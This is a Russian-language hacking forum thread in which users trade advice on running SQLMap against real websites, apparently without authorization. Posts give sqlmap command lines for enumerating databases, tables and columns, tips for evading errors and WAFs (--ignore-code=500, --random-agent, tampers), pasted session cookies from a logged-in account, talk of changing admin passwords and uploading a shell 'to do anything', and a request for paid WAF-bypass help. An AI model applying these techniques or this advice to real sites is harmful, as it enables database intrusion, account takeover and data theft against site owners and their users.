Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    тут файл с куками и прочим -p "service" --dbs --time-sec 5 --risk=3 --level=5
    попробуй так, или установи старую версию sqlmap
     
  2. NineCent

    NineCent New Member

    Joined:
    4 Nov 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Попробовал результат лучше но, теперь сервак выкидывает. Что можно далее предпринять?

    [17:33:11] [INFO] POST parameter 'service' appears to be 'IBM DB2 stacked queries (heavy query - comment)' injectable
    it looks like the back-end DBMS is 'IBM DB2'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
    [17:34:27] [INFO] checking if the injection point on POST parameter 'service' is a false positive
    [17:34:27] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
    [17:34:27] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
    [17:34:27] [WARNING] false positive or unexploitable injection point detected
    [17:34:27] [WARNING] POST parameter 'service' does not seem to be injectable
    [17:34:27] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
     
  3. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    в мапе --current-db ,вроде как текущая база,но что значит текущая? бд домена где скуля или как?
     
  4. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    303
    Likes Received:
    143
    Reputations:
    2
    да
     
    hashfinderboss likes this.
  5. ex3x1

    ex3x1 New Member

    Joined:
    14 Sep 2019
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Приветствую. Слепая инъекция в личном кабинете на сайте в get запросе, поэтому использую --cookie, скульмап выдает следующее:

    Code:
    [WARNING] provided parameter 'utm_source' appears to be 'base64' encoded
    [WARNING] provided parameter 'laravel_session' appears to be 'base64' encoded
    Cookie parameter 'XSRF-TOKEN' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]
    Независимо от того выберу я y или N - сыпется 500 ошибка, и мап ни чего не находит. Пересканивал акунетиксом раз 5, он постоянно детектит скулю и по логам получает 200 OK, а не 500 ошибку. Как раскрутить мапом? В чем проблема?

    Куки такого вида:

    Code:
    XSRF-TOKEN=eyJpdiI6IkxhNDJjRWk4Um9pWURqTjdzbCtQV1E9PSIsInZhbHVlIjoiRHhoZlk5K1h5YnI3QzQwSVlIZnBydUJcL0xhdGJvdHdYMmNtWDZnaGlOc2RsSnVaM1lCUVg3VnoyK041c2xLaE9ueEVzN2M0aGlQXC9VdGgwS2Vubys1dz09IiwibWFjIjoiNDg3YWIyZjhkYjg0Zjk0ZTk3MDEyZWJkMDAzY2Q1YmE2Yzk3NGYwMDEwNTA4ODM5M2M4NDRjZjdlYjJiZWZmZiJ9   
    
    laravel_session=eyJpdiI6InNZdEV1WVJ0Z1dVaHRnXC82UWZNM21BPT0iLCJ2YWx1ZSI6InFJa3NJVHk3eFh1cDBhaHROZGJrXC80RytQSXBkMFJTSEFRWXBLSVp3STlTdWV1RnBMRHNZOFwvMWltZ2Nvb3pFdCtZVlNTUUVUUEYwNUpNbk5ybXFiTHc9PSIsIm1hYyI6IjA1ZjUxZGEyM2Q5YmIyZWQ3MmVmMjE5N2E0YjZlNWUyNDA5ODgyNGEyNzNmZmRmZTk3Y2RkMjM0NTcyNGVlMjMifQ
     
  6. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    303
    Likes Received:
    143
    Reputations:
    2
    --ignore-code=500 по пробуй
     
    ex3x1 likes this.
  7. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    303
    Likes Received:
    143
    Reputations:
    2
    Помогло? У меня несколько раз прокатывало
     
  8. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    как то можно поменять пароль в админку через мап?
    может быть возможно если есть привлегии и тп?
     
  9. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    303
    Likes Received:
    143
    Reputations:
    2
    Возможно, если есть приведении и тп то можно шел залить и делать все что угодно
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    805
    Reputations:
    841
    Если инъекция в UPDATE или после ; то можно попробовать.
     
    _________________________
  11. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    я знаю что есть ерор,унион,болеан,таймбасед,стэйкед,инлине а как выглядит UPDATE?как проверить UPDATE или нет?
     
  12. mixer123

    mixer123 Member

    Joined:
    19 Sep 2011
    Messages:
    18
    Likes Received:
    5
    Reputations:
    0
    Доброго времени всем. При таком запросе:
    sqlmap.py --random-agent -u "https://www.site.com" --dbs --keep-alive
    Получаю название бд. Дальше при такой команде:
    sqlmap.py --random-agent -u "https://www.site.com" target url -D dbname --tables
    Получаю следующее:
    [​IMG]

    Пробовал напрямую делать запрос:
    sqlmap.py --random-agent -u "https://site.com" target url -D dbname -T user --columns

    Такая же ошибка
    [​IMG]

    Я так понимаю дело в этом?

    [​IMG]

    Подскажите пожалуйста, какие команды можно попробовать? Что можно сделать?
    Структура движка мне знакома. Исходя из этого, названия таблиц и колонок я предположительно знаю.

    P.s
    Если у кого есть свободное время, и опыт в обходе WAF, просьба написать в лс.
    Есть предложение на взаимовыгодных условиях.
     
    #1032 mixer123, 2 Apr 2020 at 3:12 PM
    Last edited: 2 Apr 2020 at 3:26 PM
  13. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    276
    Likes Received:
    111
    Reputations:
    25
    UPDATE, это оператор который обновляет столбцы в базе данных.
    mysql.ru/docs/man/UPDATE.html

    Если выполнить вывод из той же таблицы в которую гипотетически идет обновление строк, MySQL выбьет ошибку Can't specify target table for update in FROM clause
     
  14. mixer123

    mixer123 Member

    Joined:
    19 Sep 2011
    Messages:
    18
    Likes Received:
    5
    Reputations:
    0
    Застрял на этом моменте:

    [​IMG]

    Подскажите, что делать дальше?
     
    #1034 mixer123, 2 Apr 2020 at 7:56 PM
    Last edited: 2 Apr 2020 at 8:10 PM
Loading...